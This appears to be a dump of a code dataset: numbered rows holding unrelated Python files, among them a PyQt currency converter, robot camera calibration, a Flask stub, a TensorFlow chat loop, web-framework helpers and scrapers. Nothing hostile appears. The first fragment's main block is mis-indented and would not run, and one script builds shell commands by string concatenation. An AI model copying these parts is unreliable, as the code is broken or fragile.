        symbol_bottom = self.currency_value_bottom.text().split()[0]
        if combobox == self.choose_currency_conversion_top:
            self.currency_value_top.setText("{} 1.0".format(case))
            self.currency_value_bottom.setText("{} 1.0".format(symbol_bottom))
        else:
            self.currency_value_bottom.setText("{} 1.0".format(case))
            self.currency_value_top.setText("{} 1.0".format(symbol_top))
        # resetting arg_nums everytime there's a new combobox click
        self.arg_nums = []
    def on_mouse_selected_currency(self, event, label):
        """
        Changes font to bold if currency is selected and passes it to `buttons_logic()`.
        """
        font_bold = QFont("Microsoft Sans Serif", 36)
        font_bold.setBold(True)
        default_font = QFont("Microsoft Sans Serif", 36)
        default_font.setBold(False)
        label.setFont(font_bold)
        # un-bold the other label so only the active one appears selected
        if label == self.currency_value_top:
            self.currency_value_bottom.setFont(default_font)
        else:
            self.currency_value_top.setFont(default_font)
        self.buttons_logic(label)
        # resetting arg_nums everytime there's a new mouse click event
        self.arg_nums = []
    def buttons_logic(self, label):
        """Disconnects old connection and reconnects button logic to selected currency"""
        try:
            # from https://stackoverflow.com/a/21587045/13825145
            for n in range(0, 10):
                getattr(self, "num_{}".format(n)).clicked.disconnect()
            self.float_value_button.disconnect()
        # if button has not established any connections yet, this error will occur
        except TypeError:
            pass
        # can't use loop because it only computes number 9
        # (late-binding closures would all capture the last loop value)
        self.num_0.clicked.connect(lambda: self.on_number_button_clicked(self.num_0, label))
        self.num_1.clicked.connect(lambda: self.on_number_button_clicked(self.num_1, label))
        self.num_2.clicked.connect(lambda: self.on_number_button_clicked(self.num_2, label))
        self.num_3.clicked.connect(lambda: self.on_number_button_clicked(self.num_3, label))
        self.num_4.clicked.connect(lambda: self.on_number_button_clicked(self.num_4, label))
        self.num_5.clicked.connect(lambda: self.on_number_button_clicked(self.num_5, label))
        self.num_6.clicked.connect(lambda: self.on_number_button_clicked(self.num_6, label))
        self.num_7.clicked.connect(lambda: self.on_number_button_clicked(self.num_7, label))
        self.num_8.clicked.connect(lambda: self.on_number_button_clicked(self.num_8, label))
        self.num_9.clicked.connect(lambda: self.on_number_button_clicked(self.num_9, label))
        self.float_value_button.clicked.connect(
            lambda: self.on_number_button_clicked(self.float_value_button, label)
        )
    def on_number_button_clicked(self, button, label):
        """
        Adds value typed to the screen and calculates related currency
        with values loaded from the database
        """
        currency_top = self.choose_currency_conversion_top.currentText()
        currency_top = currency_top.replace(" ", "_").lower()
        symbol_top = self.currency_value_top.text().split()[0]
        currency_bottom = self.choose_currency_conversion_bottom.currentText()
        currency_bottom = currency_bottom.replace(" ", "_").lower()
        symbol_bottom = self.currency_value_bottom.text().split()[0]
        values_top = self.get_values(currency_top)
        values_bottom = self.get_values(currency_bottom)
        # 0 at index 1 should not be computed again
        # and should be overriden if another button is pressed
        if button.text() == "0" and self.arg_nums == ["0"]:
            pass
        elif button.text() != "0" and self.arg_nums == ["0"]:
            self.arg_nums[0] = button.text()
        elif button.text() == "." and self.arg_nums == []:
            # typing "." first yields "0.00" as the starting value
            self.arg_nums.append("0")
            self.arg_nums.append(button.text())
            self.arg_nums.append("00")
        elif button.text() != "0" and "".join(self.arg_nums) == "0.00":
            self.arg_nums[2] = button.text()
        else:
            self.arg_nums.append(button.text())
        arg_string = "".join(self.arg_nums)
        try:
            # 12-character cap keeps the value within the label width
            if label == self.currency_value_top and 0 < len(self.arg_nums) < 12:
                label.setText("{} {}".format(symbol_top, arg_string))
                try:
                    value_bottom = values_top[currency_bottom][0]
                    self.currency_value_bottom.setText(
                        "{} {}".format(symbol_bottom, str(round((float(arg_string) * value_bottom), 2)))
                    )
                except TypeError:  # if the currency is the same in both comboboxes
                    self.currency_value_bottom.setText("{} {}".format(symbol_bottom, arg_string))
            elif label == self.currency_value_bottom and 0 < len(self.arg_nums) < 12:
                label.setText("{} {}".format(symbol_bottom, arg_string))
                try:
                    value_top = values_bottom[currency_top][0]
                    self.currency_value_top.setText(
                        "{} {}".format(symbol_top, str(round((float(arg_string) * value_top), 2)))
                    )
                except TypeError:
                    self.currency_value_top.setText("{} {}".format(symbol_top, arg_string))
        except IndexError:
            # no rates in the database yet
            gui_warnings.on_loading_values()
    def get_values(self, currency):
        """Creates dict object dynamically depending on value of `currency` argument"""
        curr_dict = {
            "brazilian_real": None,
            "american_dollar": None,
            "european_euro": None,
            "british_pound": None,
            "japanese_yen": None,
            "swiss_frank": None,
            "canadian_dollar": None,
            "australian_dollar": None
        }
        # NOTE(review): `index` tracks the record column for each *other*
        # currency; this relies on dict insertion order matching the DB
        # column order — confirm against load_db.select_records.
        index = 0
        for key in curr_dict:
            if key != currency:
                # list comprehension to get values from data
                curr_dict[key] = [
                    element for record in select_records(currency, 1) for element in record
                    if element == record[index] and isinstance(element, float)
                ]
                index += 1
            else:
                continue
        return curr_dict
    def on_back_button(self):
        """Erases last digit typed"""
        symbol_top = self.currency_value_top.text().split()[0]
        symbol_bottom = self.currency_value_bottom.text().split()[0]
        try:
            if len(self.arg_nums) == 1:
                # removing the last digit resets both labels to the 0.0 display
                self.currency_value_top.setText("{} 0.0".format(symbol_top))
                self.currency_value_bottom.setText("{} 0.0".format(symbol_bottom))
                self.arg_nums.pop()
            elif len(self.arg_nums) > 12:  # max number displayed on screen
                self.arg_nums = self.arg_nums[:10]
                arg_string = "".join(self.arg_nums)
                self.currency_value_top.setText("{} {}".format(symbol_top, arg_string))
                self.currency_value_bottom.setText("{} {}".format(symbol_bottom, arg_string))
            else:
                self.arg_nums.pop()
                arg_string = "".join(self.arg_nums)
                self.currency_value_top.setText("{} {}".format(symbol_top, arg_string))
                self.currency_value_bottom.setText("{} {}".format(symbol_bottom, arg_string))
        except IndexError:  # if the list is empty
            pass
    def on_clear_button(self):
        """Clears the screen when the CE button is pressed"""
        symbol_top = self.currency_value_top.text().split()[0]
        symbol_bottom = self.currency_value_bottom.text().split()[0]
        self.currency_value_top.setText("{} 0.0".format(symbol_top))
        self.currency_value_bottom.setText("{} 0.0".format(symbol_bottom))
        self.arg_nums = []
    def on_clicked_update(self):
        """Gives command to run scraper and fetch data from the website"""
        process = crawler.CrawlerProcess(
            {
                "USER_AGENT": "currency scraper",
                "SCRAPY_SETTINGS_MODULE": "currency_scraper.currency_scraper.settings",
                "ITEM_PIPELINES": {
                    "currency_scraper.currency_scraper.pipelines.Sqlite3Pipeline": 300,
                }
            }
        )
        process.crawl(InvestorSpider)
        try:
            process.start()
            gui_warnings.update_notification()
        except error.ReactorNotRestartable:
            # Twisted's reactor can only be started once per process
            gui_warnings.warning_already_updated()
    def closeEvent(self, event):
        """Default PyQt5 function when closing the program"""
        super(MainWindow, self).closeEvent(event)
        try:
            reactor.stop()
        except error.ReactorNotRunning:  # if reactor has not been run in the session
            pass
def open_window():
    """Initiates instance of the class `MainWindow()` and opens GUI.

    Blocks in the Qt event loop; sys.exit propagates the app's exit code,
    so this function never returns normally.
    """
    app = QApplication(sys.argv)
    window = MainWindow()
    window.show()
    sys.exit(app.exec_())
if __name__ == "__main__":
create_database()
open_window()
qt5reactor.install()
reactor.run()
|
986,957 | 08d7e126c74d542a4dad027505d6e68ab5492a1d | """Flask App Initialization"""
from flask import Flask
app = Flask(__name__)
from .main import *
|
986,958 | f2b2636943744bb2f8ccd93e9df82d2ea0ef375b | '''
Postprocess the strftime output to remove 0 padding.
''' |
986,959 | c027c55bc068505bde407dfd2b1c4066ba258251 | import tensorflow as tf
import importlib
import random
from preprocess.data_utils import utter_preprocess, is_reach_goal
class Target_Chat():
    """Interactive human-vs-agent chat loop driving the agent toward random
    target keywords (TensorFlow 1.x session-based)."""
    def __init__(self, agent):
        self.agent = agent
        self.start_utter = config_data._start_corpus  # pool of opening lines
        with tf.Session(config=self.agent.gpu_config) as sess:
            self.agent.retrieve_init(sess)
            # Run FLAGS.times independent chat sessions in the same TF session.
            for i in range(int(FLAGS.times)):
                print('--------Session {} --------'.format(i))
                self.chat(sess)
    def chat(self, sess):
        """One session: random opener, random target keyword, up to
        config_data._max_turns human/agent exchanges."""
        history = []
        history.append(random.sample(self.start_utter, 1)[0])
        target_kw = random.sample(target_set, 1)[0]
        self.agent.target = target_kw
        self.agent.score = 0.
        self.agent.reply_list = []
        print('START: ' + history[0])
        for i in range(config_data._max_turns):
            history.append(input('HUMAN: '))
            source = utter_preprocess(history, self.agent.data_config._max_seq_len)
            reply = self.agent.retrieve(source, sess)
            print('AGENT: ', reply)
            # print('Keyword: {}, Similarity: {:.2f}'.format(self.agent.next_kw, self.agent.score))
            history.append(reply)
            # Success when the last human+agent pair mentions the target keyword.
            if is_reach_goal(history[-2] + history[-1], target_kw):
                print('Successfully chat to the target \'{}\'.'.format(target_kw))
                return
        print('Failed by reaching the maximum turn, target: \'{}\'.'.format(target_kw))
if __name__ == '__main__':
    flags = tf.flags
    # supports kernel / matrix / neural / retrieval / retrieval-stg
    flags.DEFINE_string('agent', 'kernel', 'The agent type')
    flags.DEFINE_string('times', '100', 'Conversation times')
    FLAGS = flags.FLAGS
    config_data = importlib.import_module('config.data_config')
    config_model = importlib.import_module('config.' + FLAGS.agent)
    model = importlib.import_module('model.' + FLAGS.agent)
    predictor = model.Predictor(config_model, config_data, 'test')
    # Build the target-keyword pool.  FIX: the original leaked the file handle
    # (open(...).readlines() without close) and rebuilt the list with
    # quadratic `list + list` concatenation; use `with` and extend() instead.
    target_set = []
    with open('tx_data/test/keywords.txt', 'r') as kw_file:
        for line in kw_file:
            target_set.extend(line.strip().split(' '))
    Target_Chat(predictor)
|
986,960 | 1a050bbefcc1dd2d7aed70c219d2a9f54a3f1c32 | #檢查檔案
# Check whether a previously saved products file exists.
import os  # operating system access: needed to test for the file

products = []  # rows loaded from disk, each as [name, price]
if os.path.isfile('products.csv'):  # relative path (same folder as the script)
    print('是的,找到檔案')
    # Read the saved file, skipping the header row.
    with open('products.csv', 'r', encoding='utf-8') as f:
        for line in f:
            if '商品,價格' in line:
                continue  # skip the header, move to the next line
            s = line.strip().split(',')
            # FIX: was products.append([s]), which wrapped each row in an
            # extra list and broke the [name, price] row shape.
            products.append(s)
    print(products)
else:
    print('否,找不到檔案')

# Let the user enter products interactively ('q' to stop).
# NOTE(review): this discards the rows just loaded above — confirm whether
# the loaded data was meant to seed the new list instead.
products = []
while True:
    name = input('請輸入商品名稱:')
    if name == 'q':
        break
    price = input('請輸入商品價格:')
    p = [name, price]  # one product per inner list
    products.append(p)
print(products)
# FIX: guard the first-item print — it raised IndexError when the user
# quit immediately and the list was empty.
if products:
    print(products[0][0])
for a in products:  # show each entered product
    print(a)

# Write the products back to the CSV file with a header row.
with open('products.csv', 'w', encoding='utf-8') as f:
    f.write('商品,價格\n')
    for p in products:
        f.write(p[0] + ',' + p[1] + '\n')
986,961 | babdf1ae67bb42394c184aaca30c0d71fd120d45 | import unittest
from models import movie
Movie=movie.Movie
class MovieTest(unittest.TestCase):
    """Unit tests for the Movie model class."""
    def setUp(self):
        # Arguments presumably map to (id, title, overview, poster url,
        # vote average, vote count) — confirm against models.movie.
        self.new_movie=Movie(1234,'bad boys','awsome','https://ww.image.com',5.6,12345)
    def test_instance(self):
        # Sanity check: the constructor produces a Movie instance.
        self.assertTrue(isinstance(self.new_movie,Movie))
if __name__ == '__main__':
unittest.main() |
986,962 | 8c33b1e1b937424aa690161666ea198b6866d94f | # proxy module
from __future__ import absolute_import
from apptools.preferences.ui.tree_item import *
|
986,963 | abb238333619e1547904e3969868c81bbdc914a7 | '''
Created on Jun 16, 2015
@author: baxter
'''
#!/usr/bin/env python
import roslib;
import rospy
import os,inspect
import time
import cv2
import numpy as np
from .homography import *
from .baxter import *
from geometry_msgs.msg import Point, PointStamped
from _dbus_bindings import String
from sys import argv
from decimal import *
# Global variables:
H = [] # The current homography matrix.
Z = 0 # The Z coordinate of the table.
baxter = Baxter() # The object that controls Baxter. Defined in baxter.py.
floor_reference_points = [] # The floor reference points.
floor_reference_orientations = [] # The floor reference orientations.
n_clicks = 0
tot_clicks = 4
points = []
filename = argv
original_position = None
current_position = None
def initial_setup_baxter():
    """
    Enable and set up baxter.
    """
    #print 'Initializing node...'
    #rospy.init_node('baxter_or')
    baxter.enable()
    # Calibrate the left gripper so it can be used for grasping later on.
    baxter.calibrateLeftGripper()
def on_mouse_click(event, x, y, flag, param):
    """OpenCV mouse callback: record each left-button click as an image point."""
    global n_clicks, points
    # Ignore everything except left-button presses.
    if event != cv2.EVENT_LBUTTONDOWN:
        return
    print('Point %s captured: (%s,%s)' % (n_clicks+1,x,y))
    points.append([x, y])
    n_clicks += 1
def get_img_reference_points():
    """
    This function get 4 points of reference from the image from the right hand
    of baxter. Returns an array of size 4, with 4 coordinates:
    [[x1,y1], [x2,y2], [x3,y3], [x4,y4]].
    TODO: implement this. We have to define a color we will mark the table
    and get 4 points of that color from the image.
    """
    # The following line is just for test.
    input('Enter to capture image.')
    image = baxter.getImageFromRightHandCamera()
    cvimage = baxter.getLastCvImage()
    # Keep showing the frame until tot_clicks clicks were captured; each click
    # is recorded into the module-level `points` by on_mouse_click.
    while n_clicks <= tot_clicks-1:
        # displays the image
        cv2.imshow("Click", cvimage)
        #cv.ShowImage("Click", cvimage)
        #calls the callback function "on_mouse_click'when mouse is clicked inside window
        cv2.setMouseCallback("Click", on_mouse_click, param=1)
        #cv.SetMouseCallback("Click", on_mouse_click, param=1)
        #cv.WaitKey(1000)
        cv2.waitKey(1000)
    #print points
    cv2.destroyAllWindows()
    return points
def get_floor_reference_points():
    """Read the 4 table (floor) reference points from the calibration file.

    Returns [[x1, y1], [x2, y2], [x3, y3], [x4, y4]] and stores the table
    height in the module-level Z.  The table is assumed to be level, so one
    Z value suffices for all points.

    Fixes: the calibration file was previously opened and never closed, and
    each of the 8 coordinate conversions was written out by hand; the file
    is now managed with a context manager and the parsing loop collapsed.
    """
    global Z  # This declaration is needed to modify the global variable Z
    global floor_reference_points  # Maybe erase.
    global floor_reference_orientations  # Maybe erase.
    # Hard-coded table height measured during a previous calibration run.
    Z = -0.15113003072395247
    print(Z)
    filename = "/home/sampath/midca/examples/_gazebo_baxter/calibration.txt"
    points = []
    with open(filename, 'r') as f:
        # One reference point per line, space separated; only the X and Y
        # fields (the first two columns) are used here.
        for _ in range(4):
            parts = f.readline().split(' ')
            points.append([float(parts[0]), float(parts[1])])
    return points
def calibrate_homography():
    """Compute and store the floor-to-image homography matrix H."""
    global H, Hinv
    #floor_points = get_floor_reference_points()
    img_points = get_img_reference_points()
    print(img_points)
    #print floor_points
    # NOTE(review): the interactively clicked points above are immediately
    # overwritten by these hard-coded calibration values — confirm intended.
    img_points = [[380, 136], [509, 143], [512, 324], [374, 318]]
    floor_points = [[0.5725, 0.2465], [0.8125, 0.2465], [0.8125, -0.10], [0.5725, -0.10]]
    #print img_points
    #print floor_points
    input("Enter")
    H = homography_floor_to_img(img_points, floor_points)
    return H
#I need to send H in string format
def sendPoint(msg, topic):
    """Publish `msg` once on the given ROS topic."""
    pub = rospy.Publisher(topic, String, queue_size=10)
    if not rospy.is_shutdown():
        # Give the publisher time to register with the ROS master, otherwise
        # the first message may be dropped.
        time.sleep(2)
        pub.publish(msg)
def msg_as_string(H):
    """Serialize the inverse of homography H as a comma-separated string.

    Returns the 9 entries of inv(H) in row-major order, e.g.
    "q00,q01,q02,q10,...,q22".

    Bug fix: the original concatenated raw numpy floats onto a str
    (``HtoString+","+Q[0,1]``), which raises TypeError; every entry is now
    converted with str() explicitly.
    """
    Q = np.linalg.inv(H)
    return ",".join(str(Q[i, j]) for i in range(3) for j in range(3))
def calibrate():
    """Enable the robot, then compute and return the homography matrix."""
    initial_setup_baxter()
    H = calibrate_homography()
    return H
    #sendPoint(msg_as_string(H), "calibrate_done")
    # position = getObjectPosition()
    # #baxter.closeLeftGripper()
    # sendPoint(position)
def getZ():
    """Return the calibrated table height (module-level Z)."""
    # A plain read of a module global needs no `global` declaration.
    return Z
if __name__ == '__main__':
calibrate()
|
986,964 | 864ca6c8e3907fdbc13057d8b8ab3e89eb1e37c1 | """
Pincer library
====================
An asynchronous python API wrapper meant to replace discord.py
Copyright Pincer 2021
Full MIT License can be found in `LICENSE` at the project root.
"""
from typing import NamedTuple, Literal, Optional
from pincer.client import Client, Bot
from pincer.commands import command
from pincer.objects import Intents
__package__ = "pincer"
__title__ = "Pincer library"
__description__ = "Discord API wrapper rebuild from scratch."
__author__ = "Sigmanificient, Arthurdw"
__email__ = "contact@pincer.org"
__license__ = "MIT"
from pincer.utils import Choices
ReleaseType = Optional[Literal["alpha", "beta", "candidate", "final", "dev"]]
class VersionInfo(NamedTuple):
    """A Class representing the version of the Pincer library."""
    major: int
    minor: int
    micro: int
    release_level: ReleaseType = None
    serial: int = 0
    def __repr__(self) -> str:
        """Render e.g. '0.7.1', or '1.2.3-beta4' for pre-releases."""
        base = f'{self.major}.{self.minor}.{self.micro}'
        if self.release_level is None:
            return base
        return f'{base}-{self.release_level}{self.serial}'
__version__ = VersionInfo(0, 7, 1)
__all__ = (
"__author__", "__email__", "__package__", "__title__", "__version__",
"Bot", "Client", "command", "Intents", "Choices"
)
|
986,965 | a84e3bd830ce48b9da3c49f4e0013a07cbd20e49 | #!/bin/python
#coding=utf_8
# VERSION: 1.0.0
# Author: Benjamin Delaune Bioinformatic student team 11 CRCINA
# Date : 30/08/17
import sys,os,subprocess,gzip
import functions
#####################################################################################################################################
# Database file creation: normalize a REDIportal / Human editing-site table
# into a 3-column TAB file (chrom, position, strand/allele), sorted.
#Analysis option must be the first option called
if len(sys.argv) <3:
    print ("\n*** Error:Input AND output files must be given ***")
    print ("python TAB_modification path/to/input_file path/to/output_file\n")
    sys.exit(2)
# Database file recovery
path_in=sys.argv[1]
functions.Exist_file(path_in)
# File out recovery
file_out=sys.argv[2]
# File out path verification
path_out=("/").join(file_out.split("/")[:-1])
functions.Exist_dir(path_out)
# NOTE(review): no '/' between path_out and the name, so the temp file is
# written as '<dir>tmp.tab' next to (not inside) the output dir — confirm.
path_tmp=path_out+"tmp.tab"
f_out=open(path_tmp,'w')
# NOTE(review): gzip.open(..., 'r') yields bytes on Python 3, which would
# break the substring tests below — confirm target interpreter or use 'rt'.
if ".gz" in (path_in):
    f_in=gzip.open(path_in,'r')
else:
    f_in=open(path_in,'r')
# Database name recovery (file name prefix before '_' or '.')
db_name=path_in.split("/")[-1].split("_")[0].split(".")[0]
# For each line in database line
for line in f_in:
    if "chromosome" not in line:
        col1=line.split("\t")[0]
        # 'chrX'-style labels (4 chars) keep only the last char, 'chrXY'
        # (5 chars) the last two; anything else is used verbatim.
        # REDIportal keeps column 5, Human keeps column 4.
        if len(col1)==4:
            if db_name=="REDIportal":
                f_out.write(str(col1[-1])+"\t"+str(line.split("\t")[1])+"\t"+str(line.split("\t")[4])+"\n")
            elif db_name=="Human":
                f_out.write(str(col1[-1])+"\t"+str(line.split("\t")[1])+"\t"+str(line.split("\t")[3])+"\n")
        elif len(col1)==5:
            if db_name=="REDIportal":
                f_out.write(str(col1[-2:])+"\t"+str(line.split("\t")[1])+"\t"+str(line.split("\t")[4])+"\n")
            elif db_name=="Human":
                f_out.write(str(col1[-2:])+"\t"+str(line.split("\t")[1])+"\t"+str(line.split("\t")[3])+"\n")
        else:
            if db_name=="REDIportal":
                f_out.write(str(line.split("\t")[0])+"\t"+str(line.split("\t")[1])+"\t"+str(line.split("\t")[4])+"\n")
            elif db_name=="Human":
                f_out.write(str(line.split("\t")[0])+"\t"+str(line.split("\t")[1])+"\t"+str(line.split("\t")[3])+"\n")
f_out.close()
#Sorting positions (by chromosome, then numeric position), then remove tmp
cmd = "cat "+path_tmp+ "|sort -k1,1 -k2,2n>"+file_out
cmd1 = "rm "+path_tmp
subprocess.call(cmd,shell=True)
subprocess.call(cmd1,shell=True)
|
986,966 | 18eb02dbf75b6adc5acac8873bca3377d22902b5 | import requests
from .utils import _convert
from .fields import FieldSet, RequestsField, RequestsList
class GrapheneRequests:
    """Builds a GraphQL query from FieldSet objects and POSTs it to a server."""
    __slots__ = ('query', 'json')
    def __init__(self, class_, query):
        """Expand `query` against `class_`: RequestsField/RequestsList
        attributes are replaced by the plain fields they require."""
        new_query = []
        for set_ in query:
            required = []
            new_query.append(FieldSet(set_.field, set_.args, []))
            for i in set_.sub_fields:
                obj = class_.__dict__[_convert(i.field)]
                if isinstance(obj, (RequestsField, RequestsList)):
                    # Request the dependency fields instead of the wrapper.
                    for field in obj.required_fields:
                        required.append(FieldSet(field, {}, []))
                else:
                    if not i in new_query[-1].sub_fields:
                        new_query[-1].add_sub_field(i)
            # Append the collected required fields, avoiding duplicates.
            for required_field in required:
                if not required_field in new_query[-1].sub_fields:
                    new_query[-1].add_sub_field(required_field)
        self.query = new_query
    def send(self, url):
        """Serialize the query, POST it to `url`, store the JSON reply on
        self.json and return self (fluent style)."""
        def to_string(obj): # recursive
            # Render one FieldSet to GraphQL syntax: field name, optional
            # (args), optional {sub-fields}.  Strings are quoted, other
            # argument values are emitted as-is.
            str_ = f'{obj.field} '
            args = ''
            for k, v in obj.args.items():
                args += f'{k}: "{v}" ' if isinstance(v, str) else f'{k}: {v} '
            if args:
                str_ += f'({args})'
            sub_fields = ''
            for sub_field in obj.sub_fields:
                sub_fields += to_string(sub_field)
            if sub_fields:
                str_ += f' {{{sub_fields}}} '
            return str_
        string = ''
        for i in self.query:
            string += to_string(i)
        json = {'query': f"{{{string}}}"}
        r = requests.post(url, json=json)
        # NOTE(review): assert is stripped under `python -O`; consider raising
        # an explicit exception for GraphQL errors instead.
        assert not 'errors' in r.json(), r.json()['errors']
        self.json = r.json()
        return self
986,967 | 38e04a61e95ec8e7e22521c243d07fd53bba9494 | def main():
print('Handling files in this code')
file = open("file.txt")
for text in file:
print(text, end=" ")
if __name__=="__main__": main()
|
986,968 | ab436d99863a1a462d98b8d174e79808f1205805 | # -*- coding: UTF-8 -*-
#############################################
## (C)opyright by Dirk Holtwick, 2008 ##
## All rights reserved ##
#############################################
# import pyxer.helpers as h
# import pyxer.model as model
from webob import exc
# from formencode.htmlfill import render
import sys
import logging
import string
import mimetypes
import imp
import os
import os.path
import types
import urllib
import urlparse
GAE = "google.appengine" in sys.modules
# On stage
if GAE:
STAGE = (
os.environ.get('SERVER_SOFTWARE', '').startswith('Google ') or
os.environ.get('USER', '').startswith('Google ') == 'apphosting')
else:
STAGE = True
stage = STAGE
from pyxer.utils import Dict, AttrDict
from pyxer.utils.jsonhelper import json, json_decode, json_encode
from pyxer.controller import \
Controller, isController, c, g, h, config, \
session, response, request, resp, req
from pyxer.routing import Router, static
from pyxer import helpers
import logging
log = logging.getLogger(__name__)
def url(url, *parts, **params):
    " Normalize URL: join extra path parts, resolve against the request's URL base, and encode keyword params as the query string. "
    if len(parts):
        url += "/" + "/".join(parts)
    #log.debug("URL (1) %r", url)
    url = urlparse.urljoin(request.environ["pyxer.urlbase"], url)
    log.debug("URL (2) %r", url)
    obj = list(urlparse.urlparse(url))
    if params:
        # Keyword arguments replace the query component (index 4).
        query = urllib.urlencode(params)
        # url = request.relative_url(url)
        obj[4] = query
    # If you live behind an Apache proxy
    # XXX Maybe has to go in pyxer.app?
    #if request.environ.has_key("HTTP_X_FORWARDED_HOST"):
    #    log.debug("URL (x) %r %r", obj, request.environ["HTTP_X_FORWARDED_HOST"])
    #    obj[1] = request.environ["HTTP_X_FORWARDED_HOST"]
    #    if not obj[0]:
    #        obj[0] = "http"
    url = urlparse.urlunparse(obj)
    log.debug("URL (3) %r", url)
    return url
def redirect(location=None, permanent=False):
    " Redirect to other page (301 if permanent, else 303); defaults to the current path. "
    # .exeception for Python 2.3 compatibility
    # 307
    if location is None:
        location = req.environ["PATH_INFO"]
    if permanent:
        raise exc.HTTPMovedPermanently(location=url(location)).exception
    else:
        raise exc.HTTPSeeOther(location=url(location)).exception
def abort(code=404):
    " Abort with error "
    # .exeception for Python 2.3 compatibility
    # NOTE(review): `code` is currently ignored; this always raises 404 — confirm.
    raise exc.HTTPNotFound().exception
notfound = abort
_template_cache = {}
class StreamTemplateManager:
    """Loads templates relative to a root directory, with an mtime-based cache."""
    def __init__(self, root):
        # Directory all template paths are resolved against.
        self.root = root
    def load(self, path):
        """Return the parsed template for `path`, reusing the cached copy
        while the file on disk is unchanged (cache only used on stage)."""
        global _template_cache
        import pyxer.template as pyxer_template
        # During development, reload the template module on every call so
        # edits take effect without a restart.
        if not stage:
            pyxer_template = reload(pyxer_template)
        path = os.path.abspath(os.path.join(self.root, path))
        # Test if it is in cache and return if found
        mtime = os.path.getmtime(path)
        if stage and _template_cache.has_key(path):
            log.debug("Template fetching from cache")
            template, last = _template_cache.get(path)
            if mtime <= last:
                log.debug("Template fetched from cache")
                return template
            else:
                log.debug("Found a newer file than the one in the cache for %r", path)
        # Load the template
        log.debug("Loading template %r in StreamTemplateManager", path)
        data = file(path, "r").read().lstrip()
        template = pyxer_template.TemplateSoup(
            data,
            xml=data.startswith('<?xml'))
        # Allow templates to load sub-templates through this manager.
        template.load = self.load
        _template_cache[path] = (template, mtime)
        return template
def template_stream(name=None):
    " Get the template: an explicit name relative to the routed path, or the template URL derived from the current request. "
    # XXX What to do with dirname? Scenarios?
    # XXX What to do with absolute url /like/this?
    if name is not None:
        path = os.path.join(request.urlvars["pyxer.path"], name)
        dirname = os.path.dirname(path)
    else:
        path = request.template_url
        dirname = os.path.dirname(path)
    log.debug("Loading template %r", path)
    soup_manager = StreamTemplateManager(dirname)
    return soup_manager.load(path)
template = template_default = template_stream
def render_stream(template=None, **kw):
    """Generate the template with the standard helper context and render it."""
    template = template_stream(name=template)
    template.generate(Dict(c=c, h=Dict(
        url=url,
        redirect=redirect,
        strftime=helpers.strftime,
        stage=STAGE,
        ), load=template.load))
    # logging.info("CT %r", )
    # Only rewrite the default content type; an explicitly-set one is kept.
    if response.headers['Content-Type'] == 'text/html; charset=utf8':
        response.headers['Content-Type'] = 'text/html; charset=%s' % kw.get("encoding", "utf-8")
    return template.render(**kw)
render_default = render_stream
def render_json(**kw):
    " Render output as JSON object (serializes request.result) "
    if 'ext' in kw:
        if kw['ext']:
            # XXX We need to implement output by extension e.g.
            # file names ending on .json, .yaml, .xml, .rss, .atom
            pass
    response.headers['Content-Type'] = 'application/json; charset=%s' % kw.get("encoding", "utf-8")
    result = json(request.result)
    # log.debug("JSON: %r", result)
    return result
def render(result=None, render=None, **kw):
    """Pick a renderer for `result` and publish the output into the response
    body: explicit renderer > template (result is None) > JSON (dict/list)."""
    log.debug("Render called with %r %r %r", repr(result)[:40], render, kw)
    # log.debug("Render called with %r %r", render, kw)
    # log.debug("Response %r %r", response.body_file, response.body)
    # Choose a renderer
    render_func = None
    # Render is explicitly defined by @controller
    if render is not None:
        render_func = render
    # If the result is None (same as no return in function at all)
    # then apply the corresponding template
    # XXX Maybe better test if response.body/body_file is also empty
    elif result is None:
        render_func = render_default
    # Consider dict and list as JSON data
    elif isinstance(result, dict) or isinstance(result, list):
        render_func = render_json
    # Execute render function
    log.debug("Render func %r", render_func)
    if render_func is not None:
        request.result = result
        log.debug("Render with func %r", render_func)
        result = render_func(**kw)
    # Normalize output
    # if (not None) and (not isinstance(result, str)) and (not isinstance(result, str)):
    #     result = str(result)
    # Publish result: unicode goes through the charset-aware setter.
    if isinstance(result, unicode):
        response.charset = 'utf-8'
        response.unicode_body = result
    elif isinstance(result, str):
        response.body = result
    return response.body
_render = render
class controller(Controller):
    """Controller decorator that renders the handler's return value."""
    def render(self, result, render=None, **kw):
        # If the handler already wrote the body directly, leave it untouched.
        if response.body:
            log.debug("Render: Body is already present")
            return response.body
        return _render(result, render, **kw)
class expose(controller):
    """Controller variant that forwards URL vars and request params as kwargs."""
    def call(self, *a, **kw):
        " Add arguments "
        # Collect routing variables, excluding internal pyxer/router keys.
        data = {}
        for k, v in dict(request.urlvars).items():
            if not (k.startswith("pyxer.") or k in ("controller", "module")):
                data[k] = v
        request.charset = 'utf8'
        # Request parameters override URL variables of the same name.
        for k,v in request.params.items():
            data[str(k)] = v
        # data.update(dict(request.params))
        # log.debug("Call func with params %r and urlvars %r", dict(request.params), dict(request.urlvars))
        return self.func(**data)
class Permission(object):
    """
    Permission check usable as a predicate, e.g.:
    @controller(permission=Permission('read'))
    """
    def __init__(self, permission):
        # Bug fix: the attribute was merely read (`self.permission`) instead
        # of assigned, so every later __call__ raised AttributeError.
        self.permission = permission
    def __call__(self, permissions):
        """Return True if this permission is among `permissions`
        (a single name or an iterable of names)."""
        if isinstance(permissions, basestring):
            permissions = [permissions]
        return self.permission in permissions
|
986,969 | c49a0b610b533d4701d065f5dc281ede3c4eb0cf | # -*- coding: utf-8 -*-
from util import spider_util
from bs4 import BeautifulSoup
import json
import demjson
from pandas import DataFrame
from util import coordinate_util
def areaSnatch():
    """
    Fetch primary- and middle-school district map records, convert their
    coordinates in place, and return the combined list.
    :return: list of school dicts
    """
    # Primary-school districts
    datas = []
    primaryschool_url = 'http://map.28dat.net/inc/ftxx.js'
    data = spider_util.open_url(primaryschool_url).decode()
    # The JS file wraps an array literal in `return [...];` — extract it.
    start = data.find('return')
    end = data.find('];')
    data = data[start + 6:end + 1]  # keep only the coordinate payload
    primaryschool_area = demjson.decode(data)
    coordinate_handle(primaryschool_area, '小学')
    # Middle-school districts
    middleschool_url = 'http://map.28dat.net/inc/ftcz.js'
    data = spider_util.open_url(middleschool_url).decode()
    start = data.find('return')
    end = data.find('];')
    data = data[start + 6:end + 1]  # keep only the coordinate payload
    middleschool_area = demjson.decode(data)
    coordinate_handle(middleschool_area, '初中')
    datas.extend(primaryschool_area)
    datas.extend(middleschool_area)
    return datas
def requset_school_info(areas):
    """Fetch and print the description page of each school.

    (Name kept as-is, including the 'requset' typo, for caller compatibility.)
    """
    schoolnames = []
    infourl_prefix = 'http://map.28dat.net/s_ft/school.aspx?no='
    for school in areas:
        print(school)
